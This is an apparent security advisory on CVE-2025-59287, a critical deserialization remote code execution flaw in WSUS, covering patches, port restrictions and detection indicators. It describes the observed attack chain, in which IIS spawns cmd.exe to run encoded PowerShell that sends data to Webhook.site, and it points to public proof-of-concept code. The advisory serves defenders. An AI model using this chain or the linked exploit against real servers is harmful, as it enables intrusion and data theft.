Full Report
Exploitation of CVE-2025-59287 began after public disclosure and the release of proof-of-concept code
Analysis Summary
# Vulnerability: Remote Code Execution in Windows Server Update Services (WSUS) Leading to Data Exfiltration
## CVE Details
- CVE ID: CVE-2025-59287
- CVSS Score: Not explicitly detailed, **Severity implied as Critical** due to RCE and active exploitation leading to data harvesting.
- CWE: Deserialization Vulnerability
## Affected Systems
- Products: Microsoft Windows Server Update Services (WSUS)
- Versions: All versions addressed by the October 14, 2025 patch and the subsequent October 23 out-of-band update.
- Configurations: Specifically impacting internet-facing WSUS servers, particularly those exposing default WSUS ports (8530 and 8531) publicly.
## Vulnerability Description
The vulnerability is described as a **critical deserialization bug** within the Windows Server Update Services (WSUS) component. Successful exploitation allows a remote, unauthenticated attacker to achieve Remote Code Execution (RCE) on the vulnerable server. The execution path observed involved IIS worker processes running nested `cmd.exe` processes to execute Base64-encoded PowerShell commands.
## Exploitation
- Status: **Exploited in the wild** (Observed starting October 24, 2025). **PoC available** (Released publicly, leading to an out-of-band patch).
- Complexity: Implied **Low**, given the rapid wave of exploitation following PoC release.
- Attack Vector: **Network** (Targeting internet-facing web services).
## Impact
The exploitation observed was used specifically for **data harvesting**.
- Confidentiality: **High** (Harvesting Active Directory domain user lists and network interface configurations).
- Integrity: **Medium** (Executing arbitrary code, though the initial observed payload focused on reconnaissance).
- Availability: **Low to Medium** (Potential for secondary impact depending on the further intent of the threat actor).
## Remediation
### Patches
- Microsoft released initial patches on **October 14, 2025**.
- Microsoft issued an **out-of-band security update on October 23, 2025**, subsequent to public technical analysis and the release of PoC code.
*Organizations must ensure they have applied the most recent security updates from Microsoft addressing CVE-2025-59287.*
### Workarounds
- **Restrict External Access:** Immediately identify and block direct internet access to WSUS server interfaces (specifically ports 8530 and 8531 if exposed). WSUS should generally not be public-facing.
## Detection
- **Indicators of Compromise (IOCs):**
- Presence of PowerShell commands executed via nested `cmd.exe` processes originating from IIS worker processes on WSUS servers.
- Outbound network connections attempting to send collected system data (IP, user lists, interface configs) to external services, such as **Webhook.site** addresses.
- **Detection Methods and Tools:**
- Review **network, host, and application logs** for signs of unusual activity on or originating from WSUS servers.
- Monitor for anomalous process trees starting from IIS applications leading to command execution utilities.
## References
- Vendor Advisory: msrc dot microsoft dot com/update-guide/vulnerability/CVE-2025-59287
- Technical Analysis/PoC Source: hawktrace dot com/blog/CVE-2025-59287-UNAUTH
- PoC Code Location: gist dot github dot com/hawktrace/76b3ea4275a5e2191e6582bdc5a0dc8b